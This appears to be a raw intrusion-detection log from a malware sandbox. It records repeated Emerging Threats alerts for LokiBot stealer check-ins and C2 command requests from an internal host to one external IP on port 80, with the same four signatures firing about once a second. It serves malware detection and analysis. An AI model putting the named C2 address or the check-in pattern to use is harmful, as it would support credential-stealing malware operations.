                                11/22/21-15:33:43.482146TCP2025381ET TROJAN LokiBot Checkin5011780192.168.11.20192.185.217.246
                                11/22/21-15:33:43.482146TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25011780192.168.11.20192.185.217.246
                                11/22/21-15:33:44.299983TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15011880192.168.11.20192.185.217.246
                                11/22/21-15:33:44.299983TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5011880192.168.11.20192.185.217.246
                                11/22/21-15:33:44.299983TCP2025381ET TROJAN LokiBot Checkin5011880192.168.11.20192.185.217.246
                                11/22/21-15:33:44.299983TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25011880192.168.11.20192.185.217.246
                                11/22/21-15:33:45.223452TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15011980192.168.11.20192.185.217.246
                                11/22/21-15:33:45.223452TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5011980192.168.11.20192.185.217.246
                                11/22/21-15:33:45.223452TCP2025381ET TROJAN LokiBot Checkin5011980192.168.11.20192.185.217.246
                                11/22/21-15:33:45.223452TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25011980192.168.11.20192.185.217.246
                                11/22/21-15:33:46.213718TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15012080192.168.11.20192.185.217.246
                                11/22/21-15:33:46.213718TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5012080192.168.11.20192.185.217.246
                                11/22/21-15:33:46.213718TCP2025381ET TROJAN LokiBot Checkin5012080192.168.11.20192.185.217.246
                                11/22/21-15:33:46.213718TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25012080192.168.11.20192.185.217.246
                                11/22/21-15:33:47.204059TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15012180192.168.11.20192.185.217.246
                                11/22/21-15:33:47.204059TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5012180192.168.11.20192.185.217.246
                                11/22/21-15:33:47.204059TCP2025381ET TROJAN LokiBot Checkin5012180192.168.11.20192.185.217.246
                                11/22/21-15:33:47.204059TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25012180192.168.11.20192.185.217.246
                                11/22/21-15:33:48.024959TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15012280192.168.11.20192.185.217.246
                                11/22/21-15:33:48.024959TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5012280192.168.11.20192.185.217.246
                                11/22/21-15:33:48.024959TCP2025381ET TROJAN LokiBot Checkin5012280192.168.11.20192.185.217.246
                                11/22/21-15:33:48.024959TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25012280192.168.11.20192.185.217.246
                                11/22/21-15:33:48.869765TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15012380192.168.11.20192.185.217.246
                                11/22/21-15:33:48.869765TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5012380192.168.11.20192.185.217.246
                                11/22/21-15:33:48.869765TCP2025381ET TROJAN LokiBot Checkin5012380192.168.11.20192.185.217.246
                                11/22/21-15:33:48.869765TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25012380192.168.11.20192.185.217.246
                                11/22/21-15:33:49.714851TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15012480192.168.11.20192.185.217.246
                                11/22/21-15:33:49.714851TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5012480192.168.11.20192.185.217.246
                                11/22/21-15:33:49.714851TCP2025381ET TROJAN LokiBot Checkin5012480192.168.11.20192.185.217.246
                                11/22/21-15:33:49.714851TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25012480192.168.11.20192.185.217.246
                                11/22/21-15:33:50.565595TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15012580192.168.11.20192.185.217.246
                                11/22/21-15:33:50.565595TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5012580192.168.11.20192.185.217.246
                                11/22/21-15:33:50.565595TCP2025381ET TROJAN LokiBot Checkin5012580192.168.11.20192.185.217.246
                                11/22/21-15:33:50.565595TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25012580192.168.11.20192.185.217.246
                                11/22/21-15:33:51.324056TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15012680192.168.11.20192.185.217.246
                                11/22/21-15:33:51.324056TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5012680192.168.11.20192.185.217.246
                                11/22/21-15:33:51.324056TCP2025381ET TROJAN LokiBot Checkin5012680192.168.11.20192.185.217.246
                                11/22/21-15:33:51.324056TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25012680192.168.11.20192.185.217.246
                                11/22/21-15:33:52.170742TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15012780192.168.11.20192.185.217.246
                                11/22/21-15:33:52.170742TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5012780192.168.11.20192.185.217.246
                                11/22/21-15:33:52.170742TCP2025381ET TROJAN LokiBot Checkin5012780192.168.11.20192.185.217.246
                                11/22/21-15:33:52.170742TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25012780192.168.11.20192.185.217.246
                                11/22/21-15:33:52.990002TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15012880192.168.11.20192.185.217.246
                                11/22/21-15:33:52.990002TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5012880192.168.11.20192.185.217.246
                                11/22/21-15:33:52.990002TCP2025381ET TROJAN LokiBot Checkin5012880192.168.11.20192.185.217.246
                                11/22/21-15:33:52.990002TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25012880192.168.11.20192.185.217.246
                                11/22/21-15:33:53.798329TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15012980192.168.11.20192.185.217.246
                                11/22/21-15:33:53.798329TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5012980192.168.11.20192.185.217.246
                                11/22/21-15:33:53.798329TCP2025381ET TROJAN LokiBot Checkin5012980192.168.11.20192.185.217.246
                                11/22/21-15:33:53.798329TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25012980192.168.11.20192.185.217.246
                                11/22/21-15:33:54.597963TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15013080192.168.11.20192.185.217.246
                                11/22/21-15:33:54.597963TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5013080192.168.11.20192.185.217.246
                                11/22/21-15:33:54.597963TCP2025381ET TROJAN LokiBot Checkin5013080192.168.11.20192.185.217.246
                                11/22/21-15:33:54.597963TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25013080192.168.11.20192.185.217.246
                                11/22/21-15:33:55.401627TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15013180192.168.11.20192.185.217.246
                                11/22/21-15:33:55.401627TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5013180192.168.11.20192.185.217.246
                                11/22/21-15:33:55.401627TCP2025381ET TROJAN LokiBot Checkin5013180192.168.11.20192.185.217.246
                                11/22/21-15:33:55.401627TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25013180192.168.11.20192.185.217.246
                                11/22/21-15:33:56.133743TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15013280192.168.11.20192.185.217.246
                                11/22/21-15:33:56.133743TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5013280192.168.11.20192.185.217.246
                                11/22/21-15:33:56.133743TCP2025381ET TROJAN LokiBot Checkin5013280192.168.11.20192.185.217.246
                                11/22/21-15:33:56.133743TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25013280192.168.11.20192.185.217.246
                                11/22/21-15:33:56.942614TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15013380192.168.11.20192.185.217.246
                                11/22/21-15:33:56.942614TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5013380192.168.11.20192.185.217.246
                                11/22/21-15:33:56.942614TCP2025381ET TROJAN LokiBot Checkin5013380192.168.11.20192.185.217.246
                                11/22/21-15:33:56.942614TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25013380192.168.11.20192.185.217.246
                                11/22/21-15:33:57.781892TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15013480192.168.11.20192.185.217.246
                                11/22/21-15:33:57.781892TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5013480192.168.11.20192.185.217.246
                                11/22/21-15:33:57.781892TCP2025381ET TROJAN LokiBot Checkin5013480192.168.11.20192.185.217.246
                                11/22/21-15:33:57.781892TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25013480192.168.11.20192.185.217.246
                                11/22/21-15:33:58.570957TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15013580192.168.11.20192.185.217.246
                                11/22/21-15:33:58.570957TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5013580192.168.11.20192.185.217.246
                                11/22/21-15:33:58.570957TCP2025381ET TROJAN LokiBot Checkin5013580192.168.11.20192.185.217.246
                                11/22/21-15:33:58.570957TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25013580192.168.11.20192.185.217.246
                                11/22/21-15:33:59.383447TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15013680192.168.11.20192.185.217.246
                                11/22/21-15:33:59.383447TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5013680192.168.11.20192.185.217.246
                                11/22/21-15:33:59.383447TCP2025381ET TROJAN LokiBot Checkin5013680192.168.11.20192.185.217.246
                                11/22/21-15:33:59.383447TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25013680192.168.11.20192.185.217.246
                                11/22/21-15:34:00.188377TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15013780192.168.11.20192.185.217.246
                                11/22/21-15:34:00.188377TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5013780192.168.11.20192.185.217.246
                                11/22/21-15:34:00.188377TCP2025381ET TROJAN LokiBot Checkin5013780192.168.11.20192.185.217.246
                                11/22/21-15:34:00.188377TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25013780192.168.11.20192.185.217.246
                                11/22/21-15:34:01.009894TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15013880192.168.11.20192.185.217.246
                                11/22/21-15:34:01.009894TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5013880192.168.11.20192.185.217.246
                                11/22/21-15:34:01.009894TCP2025381ET TROJAN LokiBot Checkin5013880192.168.11.20192.185.217.246
                                11/22/21-15:34:01.009894TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25013880192.168.11.20192.185.217.246
                                11/22/21-15:34:01.802552TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15013980192.168.11.20192.185.217.246
                                11/22/21-15:34:01.802552TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5013980192.168.11.20192.185.217.246
                                11/22/21-15:34:01.802552TCP2025381ET TROJAN LokiBot Checkin5013980192.168.11.20192.185.217.246
                                11/22/21-15:34:01.802552TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25013980192.168.11.20192.185.217.246
                                11/22/21-15:34:02.616982TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15014080192.168.11.20192.185.217.246
                                11/22/21-15:34:02.616982TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5014080192.168.11.20192.185.217.246
                                11/22/21-15:34:02.616982TCP2025381ET TROJAN LokiBot Checkin5014080192.168.11.20192.185.217.246
                                11/22/21-15:34:02.616982TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25014080192.168.11.20192.185.217.246
                                11/22/21-15:34:03.466069TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15014180192.168.11.20192.185.217.246
                                11/22/21-15:34:03.466069TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5014180192.168.11.20192.185.217.246
                                11/22/21-15:34:03.466069TCP2025381ET TROJAN LokiBot Checkin5014180192.168.11.20192.185.217.246
                                11/22/21-15:34:03.466069TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25014180192.168.11.20192.185.217.246
                                11/22/21-15:34:04.250412TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15014280192.168.11.20192.185.217.246
                                11/22/21-15:34:04.250412TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5014280192.168.11.20192.185.217.246
                                11/22/21-15:34:04.250412TCP2025381ET TROJAN LokiBot Checkin5014280192.168.11.20192.185.217.246
                                11/22/21-15:34:04.250412TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25014280192.168.11.20192.185.217.246
                                11/22/21-15:34:05.094728TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15014380192.168.11.20192.185.217.246
                                11/22/21-15:34:05.094728TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5014380192.168.11.20192.185.217.246
                                11/22/21-15:34:05.094728TCP2025381ET TROJAN LokiBot Checkin5014380192.168.11.20192.185.217.246
                                11/22/21-15:34:05.094728TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25014380192.168.11.20192.185.217.246
                                11/22/21-15:34:05.909445TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15014480192.168.11.20192.185.217.246
                                11/22/21-15:34:05.909445TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5014480192.168.11.20192.185.217.246
                                11/22/21-15:34:05.909445TCP2025381ET TROJAN LokiBot Checkin5014480192.168.11.20192.185.217.246
                                11/22/21-15:34:05.909445TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25014480192.168.11.20192.185.217.246
                                11/22/21-15:34:06.763994TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15014580192.168.11.20192.185.217.246
                                11/22/21-15:34:06.763994TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5014580192.168.11.20192.185.217.246
                                11/22/21-15:34:06.763994TCP2025381ET TROJAN LokiBot Checkin5014580192.168.11.20192.185.217.246
                                11/22/21-15:34:06.763994TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25014580192.168.11.20192.185.217.246
                                11/22/21-15:34:07.594828TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15014680192.168.11.20192.185.217.246
                                11/22/21-15:34:07.594828TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5014680192.168.11.20192.185.217.246
                                11/22/21-15:34:07.594828TCP2025381ET TROJAN LokiBot Checkin5014680192.168.11.20192.185.217.246
                                11/22/21-15:34:07.594828TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25014680192.168.11.20192.185.217.246
                                11/22/21-15:34:08.321317TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15014780192.168.11.20192.185.217.246
                                11/22/21-15:34:08.321317TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5014780192.168.11.20192.185.217.246
                                11/22/21-15:34:08.321317TCP2025381ET TROJAN LokiBot Checkin5014780192.168.11.20192.185.217.246
                                11/22/21-15:34:08.321317TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25014780192.168.11.20192.185.217.246
                                11/22/21-15:34:09.136717TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15014880192.168.11.20192.185.217.246
                                11/22/21-15:34:09.136717TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5014880192.168.11.20192.185.217.246
                                11/22/21-15:34:09.136717TCP2025381ET TROJAN LokiBot Checkin5014880192.168.11.20192.185.217.246
                                11/22/21-15:34:09.136717TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25014880192.168.11.20192.185.217.246
                                11/22/21-15:34:09.925664TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15014980192.168.11.20192.185.217.246
                                11/22/21-15:34:09.925664TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5014980192.168.11.20192.185.217.246
                                11/22/21-15:34:09.925664TCP2025381ET TROJAN LokiBot Checkin5014980192.168.11.20192.185.217.246
                                11/22/21-15:34:09.925664TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25014980192.168.11.20192.185.217.246
                                11/22/21-15:34:10.734740TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15015080192.168.11.20192.185.217.246
                                11/22/21-15:34:10.734740TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5015080192.168.11.20192.185.217.246
                                11/22/21-15:34:10.734740TCP2025381ET TROJAN LokiBot Checkin5015080192.168.11.20192.185.217.246
                                11/22/21-15:34:10.734740TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25015080192.168.11.20192.185.217.246
                                11/22/21-15:34:11.557248TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15015180192.168.11.20192.185.217.246
                                11/22/21-15:34:11.557248TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5015180192.168.11.20192.185.217.246
                                11/22/21-15:34:11.557248TCP2025381ET TROJAN LokiBot Checkin5015180192.168.11.20192.185.217.246
                                11/22/21-15:34:11.557248TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25015180192.168.11.20192.185.217.246
                                11/22/21-15:34:12.392309TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15015280192.168.11.20192.185.217.246
                                11/22/21-15:34:12.392309TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5015280192.168.11.20192.185.217.246
                                11/22/21-15:34:12.392309TCP2025381ET TROJAN LokiBot Checkin5015280192.168.11.20192.185.217.246
                                11/22/21-15:34:12.392309TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25015280192.168.11.20192.185.217.246
                                11/22/21-15:34:13.343348TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15015380192.168.11.20192.185.217.246
                                11/22/21-15:34:13.343348TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5015380192.168.11.20192.185.217.246
                                11/22/21-15:34:13.343348TCP2025381ET TROJAN LokiBot Checkin5015380192.168.11.20192.185.217.246
                                11/22/21-15:34:13.343348TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25015380192.168.11.20192.185.217.246
                                11/22/21-15:34:14.101417TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15015480192.168.11.20192.185.217.246
                                11/22/21-15:34:14.101417TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5015480192.168.11.20192.185.217.246
                                11/22/21-15:34:14.101417TCP2025381ET TROJAN LokiBot Checkin5015480192.168.11.20192.185.217.246
                                11/22/21-15:34:14.101417TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25015480192.168.11.20192.185.217.246
                                11/22/21-15:34:14.946363TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15015580192.168.11.20192.185.217.246
                                11/22/21-15:34:14.946363TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5015580192.168.11.20192.185.217.246
                                11/22/21-15:34:14.946363TCP2025381ET TROJAN LokiBot Checkin5015580192.168.11.20192.185.217.246
                                11/22/21-15:34:14.946363TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25015580192.168.11.20192.185.217.246
                                11/22/21-15:34:15.713509TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15015680192.168.11.20192.185.217.246
                                11/22/21-15:34:15.713509TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5015680192.168.11.20192.185.217.246
                                11/22/21-15:34:15.713509TCP2025381ET TROJAN LokiBot Checkin5015680192.168.11.20192.185.217.246
                                11/22/21-15:34:15.713509TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25015680192.168.11.20192.185.217.246
                                11/22/21-15:34:16.554179TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15015780192.168.11.20192.185.217.246
                                11/22/21-15:34:16.554179TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5015780192.168.11.20192.185.217.246
                                11/22/21-15:34:16.554179TCP2025381ET TROJAN LokiBot Checkin5015780192.168.11.20192.185.217.246
                                11/22/21-15:34:16.554179TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25015780192.168.11.20192.185.217.246
                                11/22/21-15:34:17.418825TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15015880192.168.11.20192.185.217.246
                                11/22/21-15:34:17.418825TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5015880192.168.11.20192.185.217.246
                                11/22/21-15:34:17.418825TCP2025381ET TROJAN LokiBot Checkin5015880192.168.11.20192.185.217.246
                                11/22/21-15:34:17.418825TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25015880192.168.11.20192.185.217.246
                                11/22/21-15:34:18.255679TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15015980192.168.11.20192.185.217.246
                                11/22/21-15:34:18.255679TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5015980192.168.11.20192.185.217.246
                                11/22/21-15:34:18.255679TCP2025381ET TROJAN LokiBot Checkin5015980192.168.11.20192.185.217.246
                                11/22/21-15:34:18.255679TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25015980192.168.11.20192.185.217.246
                                11/22/21-15:34:19.094694TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15016080192.168.11.20192.185.217.246
                                11/22/21-15:34:19.094694TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5016080192.168.11.20192.185.217.246
                                11/22/21-15:34:19.094694TCP2025381ET TROJAN LokiBot Checkin5016080192.168.11.20192.185.217.246
                                11/22/21-15:34:19.094694TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25016080192.168.11.20192.185.217.246
                                11/22/21-15:34:19.920183TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15016180192.168.11.20192.185.217.246
                                11/22/21-15:34:19.920183TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5016180192.168.11.20192.185.217.246
                                11/22/21-15:34:19.920183TCP2025381ET TROJAN LokiBot Checkin5016180192.168.11.20192.185.217.246
                                11/22/21-15:34:19.920183TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25016180192.168.11.20192.185.217.246
                                11/22/21-15:34:20.741592TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15016280192.168.11.20192.185.217.246
                                11/22/21-15:34:20.741592TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5016280192.168.11.20192.185.217.246
                                11/22/21-15:34:20.741592TCP2025381ET TROJAN LokiBot Checkin5016280192.168.11.20192.185.217.246
                                11/22/21-15:34:20.741592TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25016280192.168.11.20192.185.217.246
                                11/22/21-15:34:21.560382TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15016380192.168.11.20192.185.217.246
                                11/22/21-15:34:21.560382TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5016380192.168.11.20192.185.217.246
                                11/22/21-15:34:21.560382TCP2025381ET TROJAN LokiBot Checkin5016380192.168.11.20192.185.217.246
                                11/22/21-15:34:21.560382TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25016380192.168.11.20192.185.217.246
                                11/22/21-15:34:22.383551TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15016480192.168.11.20192.185.217.246
                                11/22/21-15:34:22.383551TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5016480192.168.11.20192.185.217.246
                                11/22/21-15:34:22.383551TCP2025381ET TROJAN LokiBot Checkin5016480192.168.11.20192.185.217.246
                                11/22/21-15:34:22.383551TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25016480192.168.11.20192.185.217.246
                                11/22/21-15:34:23.201231TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15016580192.168.11.20192.185.217.246
                                11/22/21-15:34:23.201231TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5016580192.168.11.20192.185.217.246
                                11/22/21-15:34:23.201231TCP2025381ET TROJAN LokiBot Checkin5016580192.168.11.20192.185.217.246
                                11/22/21-15:34:23.201231TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25016580192.168.11.20192.185.217.246
                                11/22/21-15:34:23.937031TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15016680192.168.11.20192.185.217.246
                                11/22/21-15:34:23.937031TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5016680192.168.11.20192.185.217.246
                                11/22/21-15:34:23.937031TCP2025381ET TROJAN LokiBot Checkin5016680192.168.11.20192.185.217.246
                                11/22/21-15:34:23.937031TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25016680192.168.11.20192.185.217.246
                                11/22/21-15:34:24.697673TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15016780192.168.11.20192.185.217.246
                                11/22/21-15:34:24.697673TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5016780192.168.11.20192.185.217.246
                                11/22/21-15:34:24.697673TCP2025381ET TROJAN LokiBot Checkin5016780192.168.11.20192.185.217.246
                                11/22/21-15:34:24.697673TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25016780192.168.11.20192.185.217.246
                                11/22/21-15:34:25.494184TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15016880192.168.11.20192.185.217.246
                                11/22/21-15:34:25.494184TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5016880192.168.11.20192.185.217.246
                                11/22/21-15:34:25.494184TCP2025381ET TROJAN LokiBot Checkin5016880192.168.11.20192.185.217.246
                                11/22/21-15:34:25.494184TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25016880192.168.11.20192.185.217.246
                                11/22/21-15:34:26.289146TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15016980192.168.11.20192.185.217.246
                                11/22/21-15:34:26.289146TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5016980192.168.11.20192.185.217.246
                                11/22/21-15:34:26.289146TCP2025381ET TROJAN LokiBot Checkin5016980192.168.11.20192.185.217.246
                                11/22/21-15:34:26.289146TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25016980192.168.11.20192.185.217.246
                                11/22/21-15:34:27.108078TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15017080192.168.11.20192.185.217.246
                                11/22/21-15:34:27.108078TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5017080192.168.11.20192.185.217.246
                                11/22/21-15:34:27.108078TCP2025381ET TROJAN LokiBot Checkin5017080192.168.11.20192.185.217.246
                                11/22/21-15:34:27.108078TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25017080192.168.11.20192.185.217.246
                                11/22/21-15:34:27.898343TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15017180192.168.11.20192.185.217.246
                                11/22/21-15:34:27.898343TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5017180192.168.11.20192.185.217.246
                                11/22/21-15:34:27.898343TCP2025381ET TROJAN LokiBot Checkin5017180192.168.11.20192.185.217.246
                                11/22/21-15:34:27.898343TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25017180192.168.11.20192.185.217.246
                                11/22/21-15:34:28.712783TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15017280192.168.11.20192.185.217.246
                                11/22/21-15:34:28.712783TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5017280192.168.11.20192.185.217.246
                                11/22/21-15:34:28.712783TCP2025381ET TROJAN LokiBot Checkin5017280192.168.11.20192.185.217.246
                                11/22/21-15:34:28.712783TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25017280192.168.11.20192.185.217.246
                                11/22/21-15:34:29.446264TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15017380192.168.11.20192.185.217.246
                                11/22/21-15:34:29.446264TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5017380192.168.11.20192.185.217.246
                                11/22/21-15:34:29.446264TCP2025381ET TROJAN LokiBot Checkin5017380192.168.11.20192.185.217.246
                                11/22/21-15:34:29.446264TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25017380192.168.11.20192.185.217.246
                                11/22/21-15:34:30.271427TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15017480192.168.11.20192.185.217.246
                                11/22/21-15:34:30.271427TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5017480192.168.11.20192.185.217.246
                                11/22/21-15:34:30.271427TCP2025381ET TROJAN LokiBot Checkin5017480192.168.11.20192.185.217.246
                                11/22/21-15:34:30.271427TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25017480192.168.11.20192.185.217.246
                                11/22/21-15:34:31.122571TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15017580192.168.11.20192.185.217.246
                                11/22/21-15:34:31.122571TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5017580192.168.11.20192.185.217.246
                                11/22/21-15:34:31.122571TCP2025381ET TROJAN LokiBot Checkin5017580192.168.11.20192.185.217.246
                                11/22/21-15:34:31.122571TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25017580192.168.11.20192.185.217.246
                                11/22/21-15:34:31.933523TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15017680192.168.11.20192.185.217.246
                                11/22/21-15:34:31.933523TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5017680192.168.11.20192.185.217.246
                                11/22/21-15:34:31.933523TCP2025381ET TROJAN LokiBot Checkin5017680192.168.11.20192.185.217.246
